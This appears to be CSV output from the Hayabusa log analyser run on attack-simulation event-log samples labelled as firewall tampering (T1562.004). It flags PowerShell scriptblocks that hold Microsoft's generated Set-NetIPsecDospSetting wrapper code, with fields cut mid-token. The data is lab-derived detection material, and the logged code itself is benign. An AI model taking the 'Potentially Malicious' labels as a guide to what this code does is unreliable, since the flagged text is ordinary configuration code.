'*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterT",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,ype = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_valu,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,ype = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 